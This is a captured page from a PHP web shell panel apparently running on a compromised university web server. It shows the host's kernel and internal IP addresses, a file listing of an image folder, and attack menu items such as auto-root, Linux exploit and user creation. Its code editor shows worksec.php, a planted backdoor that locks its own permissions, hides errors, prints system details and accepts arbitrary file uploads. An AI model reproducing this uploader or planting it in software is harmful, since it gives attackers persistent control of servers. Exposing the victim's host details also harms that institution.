Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
html3 /
img /
img /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxrwxr-x
agricultura
[ DIR ]
drwxrwxr-x
baners
[ DIR ]
drwxrwxr-x
BECAS
[ DIR ]
drwxrwxr-x
logos
[ DIR ]
drwxrwxr-x
menu
[ DIR ]
drwxrwxr-x
redes
[ DIR ]
drwxrwxr-x
video
[ DIR ]
drwxrwxr-x
calendarioactividades.png
10.72
KB
-rwxrwxr-x
calendarioestadias.png
10.7
KB
-rwxrwxr-x
CALENDARIOS2.png
201.2
KB
-rwxrwxr-x
CALENDARIOS3.png
201.7
KB
-rwxrwxr-x
CALENDARIOS4.png
206.94
KB
-rwxrwxr-x
CALENDARIOS.png
346.25
KB
-rwxrwxr-x
CALENDARIOS.psd
1.82
MB
-rwxrwxr-x
directorio.png
13.06
KB
-rwxrwxr-x
hyperlapse-20170420-142732-4x.mp4
11.23
MB
-rwxrwxr-x
hyperlapse-20170420-163321-16x.mp4
7.54
MB
-rwxrwxr-x
hyperlapse-20170420-163506-32x.mp4
4.42
MB
-rwxrwxr-x
llave.png
27.44
KB
-rwxrwxr-x
logo2.png
144.27
KB
-rwxrwxr-x
logo.png
178.29
KB
-rwxrwxr-x
logoutp.png
685.57
KB
-rwxrwxr-x
menu2.png
2.19
KB
-rwxrwxr-x
menu.png
4.63
KB
-rwxrwxr-x
Thumbs.db
27.5
KB
-rwxrwxr-x
universitarios.jpg
84.49
KB
-rwxrwxr-x
worksec.php
1.02
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close